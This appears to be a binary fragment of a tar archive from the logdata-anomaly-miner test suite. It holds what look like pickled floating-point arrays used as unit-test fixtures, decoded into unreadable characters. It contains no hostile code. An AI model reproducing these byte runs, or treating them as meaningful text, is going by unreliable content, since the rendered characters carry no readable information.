G?W͒~G?<(F_G?aG?ХDgG?3_ G?\G?8aSdflG?7IG?b2Vo G?-6UG?8󱉏G?lw;,G?a\G?q/;G?IG?l9KmG?`G?_7G?]G?3^.G?J G?[{G?ÞiG?Swj[G?Ť!L;G?ufyG?G?AG?óm^-G? yG?ot'G?ю G?5DpG?*,vG?OwG?х9I{#G?gF2G?_PCYG? R@G?6xG?^G?vG?PaBmG?@*߁G?^G?Jr,QG?aXZG?HG?8BRG?4cRG?١G?Fz@G?{G?èLG?>{DG?[Mhz:G? #G?ygG?-d5G?QψmzG? TG?*'G?=WG?iG?-tG?O<G?߅G?Ϗ=g)G?ѓG?7G?.cG?7OG?EtHG?BG?~yG?9 NbG?tG?{5XWG?BH!G?<G?&˃tG?ΔɲYG?<5KG?iG?^G?)[G?JDjG?cyG?GG?pG?etG?%G?Y4G?]mIiG?#>BG?|.o$ĂG?ivKG?eG?l[/G?HN)G?٣o#G?JPG?l#\G?'G??aG?tǬG?tLG?M/BG?.!eG?аyG?џG?uG? 
DbG?ԪG?liG?iG?![KG?GPmͯG?!EUG?35G?5-8 G?Ӟ%CG?ʈȚG?v?G?%֫9G?\âAG?PsG?JBKG?7c9G?E#G?%"pG?q2G G?_˶G?@՞6G?մ[X=G?!&WjG?~hYO8G?Њ4G?y+ G?,l=G?rpG?U HqG?2DG? ;0yG?,}~G?uD[mG?Pc5mOG?܉ G?^6>G?|G?Y8G?Z>gG?š،ISG?AckG?آ{VeaG?@UGG?81oG?+ۄW3G?|˧:#G?iG?!_G?ktEG?2 EG?NEeG?O|pG?X/G?׳ҿG? f gG?9^#+G?#Ó@G?՞>0G?]e G?2JG?nؚ&G?,G?^JG?:0G?T;G?eK"TG?VjG?FmG?+[G?0 G?"3G?ſKrG? G?/L۫`sG?~6TG?FWsDG?95IG?{G?90G?4ΓXG?D՝"G?Y\%JG?%9xG?YڟiG?O }G?ΩBG?3 G?>}G?rìG?WX[G?Z G?\G?'OIYG?͙rG?C腳G?k'xSG?6.ZG?ܐ/G? G?cCYGG??#/ G?BRbG?T=G?OG?,MG?ےF)G?blHSG?$u\…G?{kG?LsYTG?ȓR>G?G?.(G?#\G?jMÌG?@G?#G?uGG?{-G?ZTG? ViG?jF~-G?G?6tWG?D,qG?{hTj[G?^zMG?jq?8G?+[bG?,4TcG?4/G?n ^ܾG?: vkG?}TG?'0PG?@G?t"G?}ǶmƝhG? sG?fG?˓ \ ;G?0"G?78jrG?Ąb"G?a _,WG?{rv}G?wy|pG?m,^G?_kG?߯(0!2G?IJG?\'G?W/G?VSLIG?iZĮ G?O+ùG?BG~G?J9aG??~G?򘦼G?B[fG?/k/G?["*G?4G?*rG?7識G?ž؅BG?ɎC9G?ӻG?:ӢdG?ΌG"HG?#׆9G?BjG?kG?ЯQ%G?-gD G?QpG?t ,+G?YQG?MjG?=MTG?F&Y G?˅sAG?VMG?ٓKWrG? ZG? 4G?ϋ8G?\~FMG?MQ G?҇]G?*]"G?Lߌ,G?d`L#G?ڔ(G? G?[׀G? yLG?HE{G?L6CG?^><_G?]p.G?ѯkG?u]ЮіG?رG?%G?5G?k"G?c*G? %G?*qyBG?NG?tvV G?.G?hG?+!uG?׺IJG? G?6bG?qFG?k5nXVcG?ɍcRG?(ZG?{ұ$G?Gp&xEG?ZzG?zqG?>zoG?WtG?mȽWG?\G?ɢ }'G? ǮG??CʂG?VG??ӖAG?ƌ:VG?5G?`ƴG?ٌPƴG?'\itG?P'3G? `߫G?˜HJG?o[G?.'G?ݗ }G?ѨG?qG}G?BG?)RG?dG?9B^G? GG?Լ-K.G?:l)YG?'``G?ZQG?{-G?ӛJMLG?k::_YG?{G?*ugEG?c_rG?[-MG?x¸G?jG?IoVDoG?Ӯ)bG?ļwyQG?xX-G?1n:G?-G?UG?h^VG?xצG?BJG?Ɛa{G?g*G?PG?TM-G?b G?#DG?QKpG?ƎxGmG?3yOzG?G?kXG?귊rG? }iG?KG?5=6/G??G?HMAG?X`KtG?ÚnrG?\G?t ӘG?±`HG?" 0p*G?5j|ahG?ζVJG?}G?L ,G?G?-ۺyG?Im:' G?ЀGdG?68(8G?p^G?ߜG?sG?*{;0G?EʔG?W$G?-QaBG?ѽxG?MMrG?* +G?wG˺AG?W-mG?m@zG?|iG?r/)yG?/ZjG? ՎG?R+~G?`>G?pӣG?n'G?UqG?єVFG?cs?陰G?1VcfG?/TG?J,IG?6G?̕DFG?RHśG?ZVG?nfC.G?`\G?gG?ƂG?R:G?Фs)G?&G?_XHhG?%W G?) oG?RG?͒MB4G? ZG?U4/G?̮=G?NM*G?,SG?VS۱G?."*҂yG?!σG?͢tG?C̊8G?G?ZG?W@-G?ɰBG?ۀV,G?5_ 2G?ϟ ?[G?YjXG?[G?$ujG?(Y0"G?Tue](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta4_data_test7000066400000000000000000000647021437606560100275350ustar00rootroot00000000000000i](](G?Xl|G?n{G?[nRG?LG?Duo::G?yG? G? 
ǰgG?d jpG?ӉCOG?F*춉G?p0G?0@G?=WG? tG?0ƪG? gG?; G?ەVvG?]>G?GۅG?@V+ӍG?vIG?ƨG?41 G?8G?g1!G?ɟxG?!1rG?f'yG?unG?ZnG?V^G? MG?"~G??fG?MdKG?˷: G?m_4G?2G?gG?GB@vG?΂:A}G?3dq_G?|؊G?Q\G?0zG?ɰ}G?ɞ4G?Åf)7G?MGG?K4G?;bG?B3G?)øSG?LG? ˜G?sG?9G?ݒC$MG?R SUG?Ď G?'ҿC\MG?boG?k;G?XToG?[G?XNG?ў$=WG?BG? G?2M|iG?Gr"G?:q~G?%~G?)^hG?ʒaxG?ğtHCG?͢#~G?oKLG?|μlG?v?*G?kQ'G?G?"]GG?+8G? G?wDGG?OvG?"-G?&Nx G?aG?V٭ G?vG?rbG?=G? SG?r%G?SŠG?^G?G9G?w:4[G? [+WeG?ܺ[G?z;b}G?йG?p"efOG?ޚ0G?{iOG?~G?ڎG?ZMG?ݢ56.G?t{G?\xG?:0G?jt8G?ΓY`G?G:UG?EG?@|@G?'H,G?SRtG?z_oG?hpG?cs[:CG?2PG?L"G?<놟G?ǵG?hvG?qH5G??֠G?ƒ܎AG?y@JG?LH@G?#xbG?\G?5bqG?w;OG?[h!G?G?~3G?S,&G?Քr1TG?*cG?G?QUVG?j4G?)"5&G?pUbG?iK,|G?G?YzG?&'=fG?bIG?geG?־ɦ"G?¦Y7G?ΏG?+kG?G?11G?HG?ќLOG?*G?ǥ$G?Q+xG?P^9G?o{G?FN0G?v7G?<?G?؍wBsG?RƳ5G?Q sG?vGG? M^"@G?m>CG?Ƚm}G?>zGWG?dG?*?zG?]'G?tHG?G?ɣ vG?̯q,WaG?G?l>rG?|v]4G?IfG?]վG?\럲 G?D_d-dG?iRG?G?Ā]G?$2G?(>G?l1zG?U/G?Y%G?-G?]G?#V{YsG?¹`JG?Z/G?{>G? nG?ZG?G?w #G?-hjs[G?4G?˫|G?HG?ˍ<G?=GG?9ۤG?&q<#GG?w-Q+G?0>\wsG?QG?'G+G?JTaG?GNG?`ęG?_G?͏8vpG?) G?ؾR |G?ì eG?*=,@G?,G?Z_1bG?-cG?ŻsG?{IϟG?ʉgvwG?_ *NG?ܖjCGG?pnJpG? (1G?KH%G?!uT G?|! G? ߇FG?|SG?%tG?nPG?lܞVG?G?`'ϷG?˃(2{G?k~ÐG?폞^G?vp G?J8/سG?dL 퇂G?0WG?IKzn#kG?aer(pG?(KY"'G?=FG?)/G?]G?0?[G?, ضIG? G?^[KG?FG?zRcG?߽[&G?Q|Fj'G?lxG?>gqG?,Sb_G?ǜ2 ^G?ՙVG?wS^G?1wQG?| YG?ՏtG?|G?Tf'wG?ѱNCG?cT ]wG?IEG?92G??+_G?&IlG?k>䩿G?_LmG?Ԋ07G?o,G?> XG?UMe /G?vRG?RCG?wmozG?GrG?E]G?ׄFQQG?G?AG?3"G?3| G?zPqG?`xG?1#[G?]r@G?҄G?Ӕ6G?eTG?˲|G?R@2G?+Z> G?ReG?KG? (G?m jG?p,ɽG?—tNG?ō!G?6UZIG?HVG?2G?G?2'*G?gigG?2Z-G?`G?SEG?G?^HOJG?%G?w G?:FjG?DK@6G?uSG?Q8TG?Y#i4NR]G?(AuG?Ń+_G?gLg;ZG?G?+czG? ~7G?dG?hWnPG?݆Fe;G?)>G?'-G?˹)G?Wñ_PG?G?:xҴG?|SoHG?԰>QG?lrG?ʏG?220G?ʷVG?,G?G?hG?[ Kk*G?)G?oG?KGG?۸ !G?E߽q~G?lK,p\G?U 'G?ٚ)"G?ŏHiG?C~ G?@FG?k}G?!ƅzG?!G?C>?LG?TG?K)#G?ЛG?U)G?ȼG?pJޣG?=`G?AuG?$hHiuG?b))vG?bQG?~= G?ɑZG?x .hG?rG?bhG?2G?ibG?,`h@G?@t oG?p}G?yQG?yG?3`G?l\jG?g e>G?_41kG?4ȴQG?A}G?τeGG? [G?VqG?aִG?ɞ-XG?+'G?RqP 8G?SI5G?q ІG?c0G?7G?lRG?dusG?҄spG?DҠG?V UG?MG?RJG?wSrG?}K%G??֚(G?tϽAG?¥7B'G?Ż*G?_n|i,G?ޓG?46G?yk*7G?5G?G9kG? 
G?:WHYG?򥭲iG?.G?h2UǞG?Ɵq5ԟG?qDG?B%G?dG?a4*G?XuDG?5G?慩G?6:G?\cUG?u8zG?VΣG?1G?ߨQ6G?$rrG?䄂~G?YcG?UutZG? G?aCG?1uG?2xG?e ]G?FmcG?{G?HbG?i,G?-G?2ZG?6 G?TG?p~AiG?KG?uqb6G?̊)G?}6G?{VD3G?QvG?[./gG?k MG?̜)ʱG?e_沨G?˄=qG?@C?G?XG?L'iG?s:]G?X !_G?NG?تOG?ɜ.G?k4G?v%JI/G?gOG?^݌G?.)G?hG?ٽ G?>G?/w+mG?S'sCG?,kG?G#CG?İ XG?vIZCG?¦9nG?;G?Ã4$ G?ApMG?;BG?m.b%G?KjUzNG? SG?!u\xG?s)d6G? %:)G?FAyG?ܜ? G?EQgG?9QIyG?y'1!G?NɎ%+G?{DAH$G?1MwG?:Aʻ.G?tсG?t!mG?xG?xz3jG?mtGG?M efG?i!FG?vipYHG?!G?3S&OG?m٫xG?}y#G?6ʚG? G?|wG?{Z:)G?GG?˱O#F3G?F?R G?n9G?lrG?kG?CHG?1 G?fnx3G?P+Q7G?AעG? 0)G?VG?=q(nG?_3G?HodmG?5h-GG?iUG?]G?EGjG?YkgG?G?YG?:G? q79G?*kLG?' G?7qtG?OO W͸G?{LG?^H oG?9 ~G?z#qlG?ÜKRG?{[lAG?"kG?kG?#9гG?\r0G?Hf]/G?+cuQG?ˬ1 GG?B+G?0*)G?a0`G?LG6G?pL-?G?MG?a aHG?hҕ}G?ӂP@G?4]3G?ÐGG?Ң)G?Ӷ&G?) ΰG?܄?ХgG?5⪌G?}G?ddEG?p˃G?r3G,G?zG?ׯ\AG?LF@G?mfBG?@BVG?ٯ*eG?SG?ijLG?}H6rG?4P@~G?nBfG?)$G?P`mG?\ҰG?:.^G?IP0YG?¢v4uG?SFىxG?侓P8G?!(G?TG?@oJG?8K\c G?G?RTG?WG?hTtI+G?-$G?,UGfG?ZǾG?g?TG?ԠG?րCxG?'ƛ 0G?_V.G?47G?IIcJG?G?$\G?SG?NeG?r%M{G?4G?sVG?}cyG? V`2G?nG?s FG?(G?3i_:G?HZG??ԦG?[P<G?\NG?xG?NWTG?{WQ/G?x,^{ G?cEG?^XBqG?r>ߘG?@UfG?V&G?r 8G?0_G?2#5G?D۳1G?g ja?G?qkG?)G?0G?^ᑔ)G?~\G? &;WG?6VR1G?<0LxG?x'(oG?ځGG?;U\G?(y/G?ZUG?OeiG?pG?qB̈G?RG?к;G?d|G?ɖkwISG?TG?ƍ+G?=~G?(+jhG?h aqޑG?8G?/.G?ǁ zG?4$SG?StgƃeG?tŒ-G?{G?qIwXG?/UD/G?Mӗ7V7G?\I3FG?2G?pV8G?qn{G?*Bì_G?`"G?mt"G?%d[PG?ѷ$G?ܛ^m3G?$ G?X`薕G?(|@G?B&G?ZG?uE0\G?}2G?G?FޗG?dG?yןG?Z?G?vPG?jq_G?kNxG?n\PG? ٻ G?SdG?߀Q 7BG?ľa]XG?SOG?`OG?'sIuG?erG?؃G?Y_G?٥G?t1G?%IG?E鹸0G?z!hG?ↀ3fG?qMG? T'ΚG?eޛ}G?z5SG?&I(YG?ɼBS2G?P=uzG?YXGDG?E&G?Ŝ*G?+XlG?|lώG?Ϝ9;WG?E8!VG?kG?DG?ZNG?)]7G?yh.XG?qԂG?i;$G?SGWe(G?!0DMfG?spG? JG? ivG?꠳:G?N G?8q\%G?/G?<\G? $OG?x42>hG?VgG?N#G?ƂtG?Vt?G?#僎G?RVG?n۠G?OG?'G?8?G?l}G?VPG? G?幅G?Ū*cM9G?.xnG? 6}@G?8h`ײG?G?@G?4WG?1cG? [(G?ԨXhkG?^cG?$G?k~G?ѷhPG?S ȺxG?FG?y:G?Λ: G?>G?uׇQJG?iiG?ŨľG?|p6G?%WG?S>#2G?AsG?e1G?$9G?wكG?`jiG?˻QVG? G?J藓G?NsG?CJWs,G?i e$gG?'qܭZG?G}oG?7^G?}HKQ G?l8G?G?ݞ}G?~#G?^6G?JPrKG?3.bG?øXG?ܣܶG?!G?."G?^?G?ُ)ċG?]&T G?А+DVG?ĺG?Y%`G?gHG? ~ 9G?l'kG?ӣ*G?r?3G?K&G?[G?E~(G?Q@G?H%G? 
wG?3ic'G?fCG?v$7%G?*(, G?BĸQ*G?*G?f'G?MN[G? [SG?! $RG? ~iG?B${/G?(=fG?fWG?á|G?R\xG?i^bG?m.ۦG?ѕ83G?%#ȰG?Ւ{G?0\G?PPG?ܾG?VIZG?TPG?™(JG?'lܺG?vgeG?@6HG?Gr2 G?e#%EG?bZ!xG?qWoG?wMfG?'R޻gG?Rj(G?d;OG?ظȈrG?O G?[z~G?|KZG?D!-vnG?i{G??1cG?i*G?ԝ lG?{wG?~'ƼG?Ѿ (G?ʧzG?tnwG?I6G? G?ђg8G?ázL G?]y zG?)V;G?bS@~G?ͱ[G?fEG?x4cG?PŨKG?ځG?MQRG?d(G?ȶ2oG?cr/vG?X[?&G?E9G?:hIG?GG?`- ?G?swG?(R G?2tfMIG?,tG?X\G?0G?X`ҟ*G?Q0s_G?0䊖2G?HgeG?܅G?y})G?Úʎ >G?ժG?ҳ\dG? F#lG?˔G?8r3G?֖>QG?A(G?wHmG?G?0$ӥG?٣fG?3% @G?TwG?=WG?G?ںɪ,G?(܏G?CJ }G?`c;ʟG?UG?Ԧ,G?i&G? G?#v]xG?}&\G?i T3 G?y7G?ξimG?ŢhrgG?+psG?QxqyZG?p\G?1܋CG?'+r=G?G?a2(6G?#×G?˯ExG?>3fG?|lSG?`&ZXG?V0`[G?rNG?JP''G?DxUG?+e sG?CyKG?`ZdMG?r$G?淺(JG?vːG?,nMG?pTG?eja $G?ˋ]YG?>J9G?sG?lgG?VIG?hvG?ݗWiG?"1 G?ZXӌG? JG?܎juG?G|@G?ޭG?z%G? 0K!G?˛RG?~`}G?ӀEAG?M{l,G?NG?'!G?/TmIG?>BcdG?G?ɚH(H?G?qy#c-G?, G?{=G?")iG?PG?G?/ODG?y9LG?`!ޑG?iG?K7 G?ޝu|G?կ`XwG?;= G?G?E}QG?-ã?G?oGG?CIG?iiHG? 'G?wAj֩G?؎v[G?yv G?ʀG?G?єYG?%Ÿ\'G?j酺G?ݾoG?8#JG?G?c +;G?>czG?cu,G?nxkG?u]%G?3G?LG?ڲk9¢G? sMG?ILCVUG?G?cSK! iG?`k SG?G-G?_G?[?h= G?vBݴ%G?G?}n)G?[G?XgXG?!VX2G?Z, G?D<@G?9G?op?*G?I IG? .`G?/UG?X[G?0 G?WG?XJG?n?WG?۾bhWG?w G?9bn.G?EʧG?̿3G? {VG?ǎ;dG?ީ#DiG?uG?αI-G?ȟ=G?iMG?ȗ 쪽G?",G?Z>,G?T]r'G? $&(IG?'$NG? G?RFG?АG?uƚG?טTY\G?LG?fW LG?W}_G?ĥl"|G?]ONG?߁ 5G?,{$=G?^AG?V,G?۷G?=<,bG?uitG?RĊG?j!iG?#g(G?k2G?mP|]G?nϢG?p[&G?sɴ(G?ʏ3G?G?YtUF:G?aG?˚;Β~G?q[PG?۪"G?nUG?=srYG?y!.G?|TG?`̴MjG?ofG?)wJG?lG?:G?C56 G?~ƈG?$AG?6BG?RVJG?ݧB}G?{iG?tvG?uYJMG?։ƒ|G?_0bG?3_) G?lw2G?rdG?&DG?RZJ6G?v@oG?o|mG?OC`G?]-G?+G?"NsyG?ed,G?Z(+G?էKYG?¯6G?ZP˜G?0G?""0G?˱sFddG?NBDuG?eRq=NG?-&b?G?RMlG?4RG?증 G?=G?]MM?aG?G?"aG?c< ,G? Q%G?į5{nG?G?'K/OG?ruG?_G?ӐG?UZ6*G? 1G?! 6G?CVG?DG?'G?]q FwG?ͱpG? . G?ЙgvN~G?tFG?'>-G?UaG?LxG?;G?iyG?#3 G?#dG?sRAUG?̸ֳiG?D$qaG?>(G?r?GG?)`/G? 3G?Ưi]ԽG?ЂG?ȱG?w*G?ml8G?ا-ӰG?u"BG? rLG?9X>G?asG?&!G?g\ G? TG?ٳrG?cҊsG?ZP PG?r~zRG?UeG?ΪG?PJ6G?vG?G?p㛒G?h3SR}G?ϞvnoG?G?ye1}3G?^EG?c:a@G?'o|LG?F(,G?l+օG?؍G&G?K8G?W7<4G?u^m G?{[+@G?=$G? ZG?ΡעG?kH1G?oFCG?;T jG?wDeG?$mMG?Nf8BG?rG? 
!>G?R(aG?u}fG?fG?oQo +G?eG?εۻG?_tSG?9BqG?*m{G?5HG?,klG?χMfG?r,TIG?&w|G?t7?oG?o[G?GLUG?ҡ 6G?\`G?̜!]G?ط<G?+MG?fPG?eG?t_QG?N(rG?D.G?#[BG?pqG?glG?9uEG?qYyG?B0wG?2G?ЁZXOWG?hUPcG?qxZG?y-G?7^,G?ʵtG?ƌPBG?pG?ү\uG?IӯG?ˎpG?h`WG?q1G?R!qG?Ȓ}InG?K6 \G?%lFG?<ܿG?]jG?D*G?4G?]1iG?g`G?ƑelG?gf@zG?(XyG?dG?ŵי9G?tfG?ҁ܁G?۳E(G?K4G?ÈG? &+ѻG? ?8Q_G?vG?{ꂐ!G?W xG?b!KG?e{oG?*ڟmG?Iv_ G?qOHG?)Θ޴G?@G?mxG?Ԗ$U\G?5G?oI G?<G?DʽG?{ G?ʂy G?TTMG?UG?{[VݰBG?є2E^G?pa1G?BZ~IeG?5 G?h_ZG?ƷgG?>a_G?~LLcz9G?{G?epG? .GG?XlG?z-KG?hTG?h?G?aڅG?VyUG?Ys0G?v,G? &7G?ɃG?UmVyG?hB G?CMG?;rG?W"36SG?!]+,fG?e"MbG?3TaG?$e](G?Na#G?&G?y'l#G?#=xG?ǩ G?EG?+G?"}s~G? ScG?xG?͂FEG?O&G?lmc!G?HG?j̯G?=!N0G?L&cG?\ͧrG?ѶG?y$hG?Ș)G?P$G?,HB'G?7HG?ưj5G?hG?}cG?KcrG?ҖnG?G=G? 87bUG?&2.9G?yEG?cG?|G?+\T[ G?lG>TG?MG?۪\1G?i-G?G?恿<G?yG?0*G?ϊG?sG?h_HT,~G?gȯAHG?߰GG?s3G?G?!&G?Ƹ4G?7SG?`I7G? "LyG?~{fRG?àtEG?j_5G?i_gZG?I:ox/G?^G?|؆G? XG?ֺStqG?)Wt G?gp6MG?we#G?GtJG?[CSxG?yjG?=ַ}G?yO$G?tG?D0LG?М#G0G?C|G?ߛ-yG?߷kG?\*AG?$КG?gyeUG?G?k5G?KbG?ءKLG? 1G?[ZG?B$G?ؼ" G?ܣz]G?2 G?͊a1G?fgG?:^ĊG? NG?Ɏ静#G?$G?}TPG?E.G?pN#G?,JwG?SڕG?A&:?G?\bG?v@90G?ȗG?z/G?vGrG?:QG?AG?:U`G?Ǥ> *G?֘tp2G?G?ѮxJG?7a3 (G?uEG?A G?àG?V7G?x$.G?/7 G?*kRG?,SMG?"lG?l?FG?|Z%G?ԥ7G?ä)G?wjZG?,*G?/<+ G?t{hG?Y8~G?ưΪgPG?=|gٕG?cqG?Mt G?u"G?L$G?=g7G?&_ G?әy6=G?ƃ^ɨKG?ehrhG?FL5G?WG?DbyG?1=G?8P<3G?X;Q3G?p7G?:(G?؞^G?[qG?[ltG?"0sG?78G?RG?G?/G?(1G?.=aG?"'G?z}^G?WEG?lJOG?Ѷ+NG?K dG?wTNG?L$G?ItBG?]mB7]G? kG?pR]G?qkbG?q\G?bkG?lj#G?bŭjG?wG?G?Ѥ=.G?{[G?qG?J]nG?uS[G?{:G?*G?E4s5G?A 7G?D|G?Ȱ2L1G?WzFG?¡ G?wG?걕TG?ÔK+ZG?=|4G?ڢ:bpG?~(G?g}G?ӣG?|4G?ٗhG?;"G?ܭÍG?ʔV8 G?5I1G?&35G?)G?U*7G?SPG?E>G?ɸ)qG?rU{G?}'G?AwG?^`UAG?ꖈPG?%[G?ͬG?"G?ク0G?bEG?N9G?{ Ђ(G?#%aG?xF̮G?ܸYvT #G?l G?O#>{G?RFXG?ۻ.G?$MG?݃Y?!G?؟nƼG?LvG?v/eG?Hx\XG? [W]G?ؖ FG?ʌveG?Y+G?y:\3LG?+ʤ.G?G?.I׼"G?ظFG?T,/G?#;G?Y(G?ҖiC# G?e,DG?SG?ᬳuG?E<[G?>P G?ǿ !RG?v3G?}fG?NA?FG?4jG?AG?ܣ^67eGG?;IG?}y|G?iO&G?7PG?G?ņ$cRG?ՁpG?N1É4G?Ýٔ~G?oERG?vnG? NlJG?§GG?"I 0G?8G?B+G?Lʇ[G?@4G?JiG?iBG?@l-G?ZqG? 
/(G?pPjG?.*˽G?ȎKG?xb!8G?n+G?߻5G?Λ G?=}G?8_VG?5VhhG?ou G?,)G?r, )G?WUG?e1Q5G?ѴOoFPG?{jܪG?mH jG?ו5G?ҿHKcG?21aG?e@G?H*G?*G?LGG?Jq(0G?#ڹ G?ߗG?lj.G?6!G?ҘD2QG?`xG?QVVG?f9pG?v9l_FG?*G?M] YG?٭/ G?(:)G?ЭG?G9ǍG?Akm7G?i\ G?36@G?%wMG?DZG?ЛhG?QMv[9G?D1͖CG?R"G?^Wv!iG?効jG?sE(G?hFWG?"J)^G?d?G?)g)G?I-G?cYG?+WG?ș*HG?|G?-n4G?ODG?uw_G?y^pG?Ici&G?-ǔG? CSCG?n?i]G? BxG?;'7kUG?6QG?bG?YdiG?SJ;G?c7sG?>,,G?1Sй)G?v kRG?ϖ4>G?K[G?!`޲G?lG?0RG?qIG?6G?)9NG?1}4lG?!^IG?2އyG?)rG?G?/G?%ФG?y=VG?RvcG?!WVzG??G?ǜCG?N[`G?{G?G??ٸ|G?F)OG?Nk G?QG?LT.HG? j G?nT2G?,߽G?KCG?ѽ2{G?  G?L|pG?|կG?ȞfG?\2"G?G?~G?6JZ{G?$G?V8FG?$G?E@]G?G?kRi"G?Pc(G?kG?n%- G?El6-G?ٙ}4G?Ȳ7GoG?˄:|]G?n5SG?8.G?F`ӊ?FG?7G?}J2HaG?XIG?J QPG?xCG?V(‘G?I.G?ĵ1_[G?|G?Ĕ>G?*XJIG?G?,%]7G? ~KG?bYBYBG?,^DJG?rYG?'^EG? X+"G?# G?zusG?^nG?z /#G?ٔ3lJG?cQYTG?RW~AG?]GG?-G?c}G?1!$G? ( FG?G֣G?2VG?CW}G?CG?Y:,G?C,JG?RK G?1jG?8/=G?u\gG?hPXG?*naG?RG?o%s"G?"*G?WM[QG?\߬G?ߠ;G?̍PG? IG?w0G?,iI%G?lp FG?ЋG?Ǿ7G?kG?PG?""kG?ᆓ*&$G?Є;G?dA)G?' +?G?|G?[SҶG?]-pG?϶djG?riYG?^G?bO;O[G?m1@G?Z8ԯnrG?2}P.G?쓅G?+ G?7 FG?-!G?2[G?.a(G?ǖ8TmG?^JG?Mx'G?AȀG?%fG?Oc+G?ʊ|$G? 8?!G?ع}G?5o=G?npQG? m G?kSG?i4G?5@lG?į(G?6,~G?fSG?oyxG?}|]G?zdiG?X%cBG?R;G?8QG?^PG?yл G? U*G?}v&G?$G?CusG?X5G?I%8G?EYG?̳#6G?rG{IG? iG?kPN_:G?ҡ;e](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta5_data_test3000066400000000000000000000432761437606560100275350ustar00rootroot00000000000000F](](G?mP6LTG?pG?)72M]G?@9G?똉|݂G?Y G?歾G? $e|G?\EjG?܌-G?,W@RG?yBAG?_( D8G?W/vG?>PG?($G? Ta_G?#F"G?1gG?D!G?a}-G?̤G?אgG?M\G?>G? :EG?G?HXMG?B(tG?\" G?M׏G?wG?4G?rJG?HlG?yٚG?癀}h G?/9tG?ZzG?郮9;G? 9G?Elj?G?T|B;G?) jG?4<ǠG?ba1G?̒G?\֋$kG?`7AG?#g݈G?̺O G? 2G?^moMG?زM/;G?FEvG?"E G?G^.G?AG?Ԛd9G?G?]ޑ\:G?+%53G? G?@x3G?߶G?쫢mG? G?pwlG?Y˕G?E&+G?-`2G?T:4/G?IXG?Q9>G?6G?¨̉G? 4wG?DqEG?_G?xLG?v0G?G? *XG?P7~G?*AG?&ϙbG?뺺&-s5G?~9G?iaG? G?pRG?OSa~G?2JG?:/-G?~[G?AfG?d#G?k'G?]ڄrG?曐G?_G?nL5 G?MW$G?A ܆,G?MDOG? mG?r} G?ao"G?#/G?݇[ӥ\G?G?񅯘G?4G?8G?#X}G?JTsG?CFJG8G?2 ,CG?jfȜG?NG?F hG?l.G? KrG?)$G?ΰh G?2W[YG? 
} }G?{라G?PqYG?BSG?@JWG?TTG?ۡ4vG?ؔLmG?吒WG?hRiMG?EVNG?j)EG?DVsjDG?[SdqG? G?[G?'G?9KG?ʲ]!G?4B)G?Qc +G?wq(G?멱wTG?AG7G?7eG?o sG?G?'G?-PAG?,}U3G?إm(aG?KG?B%(G?èDG?T:G?s1;G?\%-UG?#% G?`G?(aVwG?8Y?G?e.G?NG?, G?JkG?(cyG?n$G?$s]G?춉ķqG? OG?f+>,G?&AEG? Hj-G?>嗤UG?+,G?!KG?,cA"G?[PG?^2'G?*G?3WG?2 eG?%G?sTG?}GVTG?~EG?[q4G?/LG?ǩ@/G?pG?3G? =G?~@G?KG?HtG?W@-fG?lӿG?5YD+G?7G?+OG?jR'G?!>G?=qEG?盜 яG?xiG?|xtG?qdG?{ۙ3G?1quG?12`G?iG?+!"ߢG?|G?!1G?kG?˩G?BG?)UG?4WG??G?wn"G? AaqG??)G?YLnG?p?G?uSG?M'< G?צ$#G? NG?߇GG?G?~hsG?h;4JG?đ;hG? m>G?MgLG?3ӤG?CG?#TG? "]G?rMG?~U G?]G?۟=*G?JNJmG?\3G?(7FG?/do"G?thdG?+ {G?~G?e.sG?7C"%G?tG?u:;G?y͑BG?@;eG? D`G?}pG?/vG?䊾 G?ѥG?ՍiZ@G?AߤG?;3(MzG?%G?߈x {LG?v&^G?j G?]&G?й&0G?ֲyG?nvG? `G?iV}G?+Ѷ?G?V1G?2G?6첹O3G?aHSG?B%G?~tHBG?\QrG?vTG? 0G^G?久 -a%G?亖 ?G?͢; iG? Q?G?y(/vG?eIaG?0wG?0G?/4HG?^GG?I G? AˌG?tޮG?"OG?Z^G?넳kG?KwG?గb%G?%EMG?F_G?ed!rG? G?Z[G?.Y؍ G?XOG?写fp G?뒀@W/G?X1G?]~G?W]NKG? G?A.ݺl#G?G?G?$1n(/G?2G8UG?* 8G?by+G?8#R8G?{N^G?ѣ\̢:G?5B|~G?v[iG?ZUG?aRG?٤gG?#_G?ﰘدG? PҵG?u.3G?]# 6G?VRG?EiPG?E"G?OcM_G?ߑǢG?: ]G?hG?qq;;G?|ӚG? vG?n FG?{zG?\G?h{G?G?P\:G?>G?첻G?1G?)!:G?j,f_(G?pG?ѵG?~ŷG? G?WG?IG?! :G?#5G?+u8G?bG?Gi&G?~HHG?4ހG?冭'jG?:G?,r-ԀG?BFlpG?.̯?G?jG?챋4'G?ꄲQG? 1G?xƪ;G? w0NG? Bc~=G?rLG?*N%G? g|G?hLbG?&)G?vWݯG?_vQG?>̥G?P=G? *G?Jt34G?0qG?eyG?RVG?uhxG?oG?jV3G? ݊NlG?lG?Z.ZG?0ϥ'G?c=JG?+&G?jRG?侰Q_G?$bkG?.b}j%G?sQՖ/G? I@G?@G?ZWG?Px.qG?썿>ߡ5G?4Ne(G?8$G?uDF,G?mOM|G?L G?kFG?U3G?ndG?곓G?/'UWG?噴?aG?뒃ȫ]G?VG?%蜭G?zNf$G?Q#aG?*G?LžG?PG?БG?qtG?3"޸ G?ۈ]G?>V"mG?UG[G?=s-G?^^%G? ;&G?셿,G?)se8G?H_G? ,CG?.cG?)G?ٙ@G?ѣ^G?GjG?@$ЖG?PG?IG?HZ?G?4G?V3#G?]G?`VG?dB5G?˅ G?wټ[G?v$G?@9G?^\G?)S>G?y*G?X&G?7IG?T~ȄG?! /G?$G?SlG?,D7m兖G?YvG?4G?頇!APG?~G?/G?~ |}G?dzdsG?CG?M"גeG?G?ө ]!G?jIǦG?G?0uG?ml G?I)G?7n*G?pWmG?2IG?`HD-G?D7~G?YM+CG?|Й G?DRG?9 PG?\}$G?TG?"/'ύ`G?N攻G?Dw:2G?/iG?HWG?LC<+G?caG?J7$G?2dYG?!G?.R|աG?ň1LG? ba/G?:G?l"JPG?馱\G?g0ezG?qTG?'r1G?KűZyG?t|;G?:@G? 
